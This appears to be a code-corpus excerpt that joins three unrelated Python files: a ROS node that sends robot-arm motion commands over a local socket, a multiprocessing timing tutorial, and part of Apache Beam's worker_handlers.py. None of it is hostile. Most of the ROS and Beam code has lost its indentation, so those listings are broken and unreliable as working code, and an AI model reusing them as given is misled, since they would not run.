speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # PEP 479: returning ends the generator; raising StopIteration here would error under Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
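# Hedged usage sketch (not part of the original script): the switch class above
# is the classic "for case in switch(x)" recipe - iterating yields the match
# method once, and the first case() that returns True wins. The function below
# only illustrates the idiom and is never called by this node.
def _switch_usage_example(value):
    for case in switch(value):
        if case(1):
            return 'one'
        if case(2, 3):
            return 'two or three'
        if case():          # default: calling with no arguments always matches
            return 'anything else'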
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------ server side -------
def point_data(req): ## receive pose data sent from the strategy side
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## receive speed-mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
    rospy.spin() ## block and process service callbacks
##------------ server side end -------
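# Hedged sketch (not part of this node): how a strategy-side client could call
# the 'arm_pos' service registered above, assuming the arm_data request fields
# are x, y, z, pitch, roll and yaw in that order. The helper name send_point is
# ours and is never called here.
def send_point(x, y, z, pitch, roll, yaw):
    rospy.wait_for_service('arm_pos')
    arm_pos = rospy.ServiceProxy('arm_pos', arm_data)
    return arm_pos(x, y, z, pitch, roll, yaw)  # returns the accumulated response count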
##---------- socket packet transmission ----------##
def Socket_command():
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
        #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
        #------- set the arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
        #------- set the arm fast / safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
    socket_cmd.action= 5 ## reset to the initial mode state
    Socket.send(data.encode('utf-8'))# send over the socket (str must be encoded for Python 3)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag,arm_mode_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
    #start_input=int(input('press 1 to start transmitting, 3 to quit: ')) # enter the start command
start_input = 1
if start_input==1:
while 1:
            ##--------------- send arm commands over the socket -----------------
#if Arm_feedback == 0:
if arm_mode_flag == True:
arm_mode_flag = False
feedback_str = Socket.recv(1024)
                #the arm side reports its current state
                if str(feedback_str[2]) == '70':# F: the arm is Ready and can accept the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
                if str(feedback_str[2]) == '84':# T: the arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
                if str(feedback_str[2]) == '54':# 6: the strategy has finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
                #check the data-sent flag
                if str(feedback_str[4]) == '48':# returned 0, false
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
                if str(feedback_str[4]) == '49':# returned 1, true
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
            ##--------------- send arm commands over the socket end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
Socket.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5 ## reset to the initial mode state
    t = threading.Thread(target=thread_test)
    t.start() # start the worker thread
socket_server()
t.join()
# Ctrl+K Ctrl+C   Add line comment
# Ctrl+K Ctrl+U   Remove line comment
# Ctrl+] / [      Indent/outdent line
|
03_multiprocessing.py
|
import multiprocessing
import time
def do_something(seconds):
    print(f'Sleep {seconds} second(s)...')
    time.sleep(seconds)
    print('Done sleeping...')

# Guard the start-up code so the script also works with the 'spawn' start
# method (the default on Windows and macOS), where children re-import this file.
if __name__ == '__main__':
    start = time.perf_counter()
    processes = []
    for _ in range(10):
        p = multiprocessing.Process(target=do_something, args=[1.5])
        p.start()
        processes.append(p)
    for process in processes:
        process.join()
    finish = time.perf_counter()
    print(f'Finished in {round(finish-start, 2)} second(s)')
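# Hedged alternative sketch (not part of the tutorial file above): the same
# fan-out written with concurrent.futures.ProcessPoolExecutor, which starts and
# joins the worker processes for us. The helper name run_with_executor is ours
# and is not called anywhere in this script.
def run_with_executor():
    import concurrent.futures
    t0 = time.perf_counter()
    with concurrent.futures.ProcessPoolExecutor() as executor:
        # map() blocks until every do_something(1.5) call has completed
        list(executor.map(do_something, [1.5] * 10))
    print(f'Executor finished in {round(time.perf_counter() - t0, 2)} second(s)')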
|
worker_handlers.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Code for communicating with the Workers."""
# mypy: disallow-untyped-defs
import collections
import contextlib
import copy
import logging
import queue
import subprocess
import sys
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import BinaryIO # pylint: disable=unused-import
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
from typing import cast
from typing import overload
import grpc
from apache_beam.io import filesystems
from apache_beam.io.filesystems import CompressionTypes
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability.fn_api_runner.execution import Buffer
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.sdk_worker import _Future
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.utils import proto_utils
from apache_beam.utils import thread_pool_executor
from apache_beam.utils.interactive_utils import is_in_notebook
from apache_beam.utils.sentinel import Sentinel
if TYPE_CHECKING:
from grpc import ServicerContext
from google.protobuf import message
from apache_beam.runners.portability.fn_api_runner.fn_runner import ExtendedProvisionInfo # pylint: disable=ungrouped-imports
# State caching is enabled in the fn_api_runner for testing, except for one
# test which runs without state caching (FnApiRunnerTestWithDisabledCaching).
# The cache is disabled in production for other runners.
STATE_CACHE_SIZE = 100
# Time-based flush is enabled in the fn_api_runner by default.
DATA_BUFFER_TIME_LIMIT_MS = 1000
_LOGGER = logging.getLogger(__name__)
T = TypeVar('T')
ConstructorFn = Callable[[
Union['message.Message', bytes],
'sdk_worker.StateHandler',
'ExtendedProvisionInfo',
'GrpcServer'
],
'WorkerHandler']
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
# type: () -> None
self._push_queue = queue.Queue(
) # type: queue.Queue[Union[beam_fn_api_pb2.InstructionRequest, Sentinel]]
self._input = None # type: Optional[Iterable[beam_fn_api_pb2.InstructionResponse]]
self._futures_by_id = dict() # type: Dict[str, ControlFuture]
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
# type: () -> None
assert self._input is not None
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
@overload
def push(self, req):
# type: (Sentinel) -> None
pass
@overload
def push(self, req):
# type: (beam_fn_api_pb2.InstructionRequest) -> ControlFuture
pass
def push(self, req):
# type: (Union[Sentinel, beam_fn_api_pb2.InstructionRequest]) -> Optional[ControlFuture]
if req is BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
# type: () -> Union[Sentinel, beam_fn_api_pb2.InstructionRequest]
return self._push_queue.get()
def set_input(self, input):
# type: (Iterable[beam_fn_api_pb2.InstructionResponse]) -> None
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
# type: () -> None
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
def abort(self, exn):
# type: (Exception) -> None
for future in self._futures_by_id.values():
future.abort(exn)
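# Hedged sketch (not from the Beam sources): how the runner side pairs a pushed
# InstructionRequest with a ControlFuture while the gRPC servicer drains the
# same queue through get_req(). The helper below is illustrative only and is
# never called by this module.
def _control_connection_example():
  # type: () -> ControlFuture
  conn = ControlConnection()
  future = conn.push(beam_fn_api_pb2.InstructionRequest())
  request = conn.get_req()  # what the Control() stream would yield next
  assert request.instruction_id  # push() assigned a unique 'control_N' id
  return future  # completed later once a response with that id is read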
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
_DONE_MARKER = Sentinel.sentinel
def __init__(
self,
worker_manager, # type: WorkerHandlerManager
):
# type: (...) -> None
self._worker_manager = worker_manager
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# following self._req_* variables are used for debugging purpose, data is
# added only when self._log_req is True.
self._req_sent = collections.defaultdict(int) # type: DefaultDict[str, int]
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(
ControlConnection) # type: DefaultDict[str, ControlConnection]
def get_conn_by_worker_id(self, worker_id):
# type: (str) -> ControlConnection
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self,
iterator, # type: Iterable[beam_fn_api_pb2.InstructionResponse]
context # type: ServicerContext
):
# type: (...) -> Iterator[beam_fn_api_pb2.InstructionRequest]
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
      raise RuntimeError(
          'All workers communicating through gRPC should have a '
          'worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
# type: () -> None
self._state = self.DONE_STATE
_LOGGER.debug(
'Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
def GetProcessBundleDescriptor(self, id, context=None):
# type: (beam_fn_api_pb2.GetProcessBundleDescriptorRequest, Any) -> beam_fn_api_pb2.ProcessBundleDescriptor
return self._worker_manager.get_process_bundle_descriptor(id)
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {} # type: Dict[str, Tuple[ConstructorFn, type]]
_worker_id_counter = -1
_lock = threading.Lock()
control_conn = None # type: ControlConnection
data_conn = None # type: data_plane._GrpcDataChannel
def __init__(self,
control_handler, # type: Any
data_plane_handler, # type: Any
state, # type: sdk_worker.StateHandler
provision_info # type: ExtendedProvisionInfo
):
# type: (...) -> None
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
# type: () -> None
self.stop_worker()
def start_worker(self):
# type: () -> None
raise NotImplementedError
def stop_worker(self):
# type: () -> None
raise NotImplementedError
def control_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
raise NotImplementedError
def artifact_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
raise NotImplementedError
def data_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def state_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def logging_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
@classmethod
def register_environment(
cls,
urn, # type: str
payload_type # type: Optional[Type[T]]
):
# type: (...) -> Callable[[Type[WorkerHandler]], Callable[[T, sdk_worker.StateHandler, ExtendedProvisionInfo, GrpcServer], WorkerHandler]]
def wrapper(constructor):
# type: (Callable) -> Callable
cls._registered_environments[urn] = constructor, payload_type # type: ignore[assignment]
return constructor
return wrapper
@classmethod
def create(cls,
environment, # type: beam_runner_api_pb2.Environment
state, # type: sdk_worker.StateHandler
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> WorkerHandler
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
# This takes a WorkerHandlerManager instead of GrpcServer, so it is not
# compatible with WorkerHandler.register_environment. There is a special case
# in WorkerHandlerManager.get_worker_handlers() that allows it to work.
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self,
unused_payload, # type: None
state, # type: sdk_worker.StateHandler
provision_info, # type: ExtendedProvisionInfo
worker_manager, # type: WorkerHandlerManager
):
# type: (...) -> None
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self # type: ignore # need Protocol to describe this
self.data_conn = self.data_plane_handler
state_cache = StateCache(STATE_CACHE_SIZE)
self.bundle_processor_cache = sdk_worker.BundleProcessorCache(
SingletonStateHandlerFactory(
sdk_worker.GlobalCachingStateHandler(state_cache, state)),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
worker_manager._process_bundle_descriptors)
self.worker = sdk_worker.SdkWorker(
self.bundle_processor_cache,
state_cache_metrics_fn=state_cache.get_monitoring_infos)
self._uid_counter = 0
def push(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> ControlFuture
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
# type: () -> None
pass
def stop_worker(self):
# type: () -> None
self.bundle_processor_cache.shutdown()
def done(self):
# type: () -> None
pass
def data_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
# A fake endpoint is needed for properly constructing timer info map in
# bundle_processor for fnapi_runner.
return endpoints_pb2.ApiServiceDescriptor(url='fake')
def state_api_service_descriptor(self):
# type: () -> None
return None
def logging_api_service_descriptor(self):
# type: () -> None
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
# type: (Iterable[beam_fn_api_pb2.LogEntry.List], Any) -> Iterator[beam_fn_api_pb2.LogControl]
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(beam_provision_api_pb2_grpc.ProvisionServiceServicer
):
def __init__(self, base_info, worker_manager):
# type: (beam_provision_api_pb2.ProvisionInfo, WorkerHandlerManager) -> None
self._base_info = base_info
self._worker_manager = worker_manager
def GetProvisionInfo(self, request, context=None):
# type: (Any, Optional[ServicerContext]) -> beam_provision_api_pb2.GetProvisionInfoResponse
if context:
worker_id = dict(context.invocation_metadata())['worker_id']
worker = self._worker_manager.get_worker(worker_id)
info = copy.copy(worker.provision_info.provision_info)
info.logging_endpoint.CopyFrom(worker.logging_api_service_descriptor())
info.artifact_endpoint.CopyFrom(worker.artifact_api_service_descriptor())
info.control_endpoint.CopyFrom(worker.control_api_service_descriptor())
else:
info = self._base_info
return beam_provision_api_pb2.GetProvisionInfoResponse(info=info)
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self,
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
worker_manager, # type: WorkerHandlerManager
):
# type: (...) -> None
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(
thread_pool_executor.shared_unbounded_instance())
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
thread_pool_executor.shared_unbounded_instance(),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
thread_pool_executor.shared_unbounded_instance(),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer(worker_manager)
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(
self.provision_info.provision_info, worker_manager),
self.control_server)
def open_uncompressed(f):
# type: (str) -> BinaryIO
return filesystems.FileSystems.open(
f, compression_type=CompressionTypes.UNCOMPRESSED)
beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
artifact_service.ArtifactRetrievalService(
file_reader=open_uncompressed),
self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer(
DATA_BUFFER_TIME_LIMIT_MS)
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
GrpcStateServicer(state), self.state_server)
self.logging_server = grpc.server(
thread_pool_executor.shared_unbounded_instance(),
options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(), self.logging_server)
_LOGGER.info('starting control server on port %s', self.control_port)
_LOGGER.info('starting data server on port %s', self.data_port)
_LOGGER.info('starting state server on port %s', self.state_port)
_LOGGER.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
# type: () -> None
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self,
state, # type: StateServicer
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> None
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler,
self._grpc_server.data_plane_handler,
state,
provision_info)
self.state = state
self.control_address = self.port_from_worker(self._grpc_server.control_port)
self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id(
self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id(
self.worker_id)
def control_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.control_port))
def artifact_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.control_port))
def data_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.data_port))
def state_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.state_port))
def logging_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.logging_port))
def close(self):
# type: () -> None
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
def port_from_worker(self, port):
# type: (int) -> str
return '%s:%s' % (self.host_from_worker(), port)
def host_from_worker(self):
# type: () -> str
return 'localhost'
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self,
external_payload, # type: beam_runner_api_pb2.ExternalPayload
state, # type: StateServicer
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(ExternalWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._external_payload = external_payload
def start_worker(self):
# type: () -> None
_LOGGER.info("Requesting worker at %s", self._external_payload.endpoint.url)
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
control_descriptor = endpoints_pb2.ApiServiceDescriptor(
url=self.control_address)
response = stub.StartWorker(
beam_fn_api_pb2.StartWorkerRequest(
worker_id=self.worker_id,
control_endpoint=control_descriptor,
artifact_endpoint=control_descriptor,
provision_endpoint=control_descriptor,
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
# type: () -> None
pass
def host_from_worker(self):
# type: () -> str
# TODO(BEAM-8646): Reconcile across platforms.
if sys.platform in ['win32', 'darwin']:
return 'localhost'
import socket
return socket.getfqdn()
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: bytes
state, # type: StateServicer
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(EmbeddedGrpcWorkerHandler,
self).__init__(state, provision_info, grpc_server)
from apache_beam.transforms.environments import EmbeddedPythonGrpcEnvironment
config = EmbeddedPythonGrpcEnvironment.parse_config(payload.decode('utf-8'))
self._state_cache_size = config.get('state_cache_size') or STATE_CACHE_SIZE
self._data_buffer_time_limit_ms = \
config.get('data_buffer_time_limit_ms') or DATA_BUFFER_TIME_LIMIT_MS
def start_worker(self):
# type: () -> None
self.worker = sdk_worker.SdkHarness(
self.control_address,
state_cache_size=self._state_cache_size,
data_buffer_time_limit_ms=self._data_buffer_time_limit_ms,
worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
# The subprocesses module is not threadsafe on Python 2.7. Use this lock to
# prevent concurrent calls to Popen().
SUBPROCESS_LOCK = threading.Lock()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
worker_command_line, # type: bytes
state, # type: StateServicer
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(SubprocessSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
# type: () -> None
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line,
self.control_address,
self.provision_info,
self.worker_id)
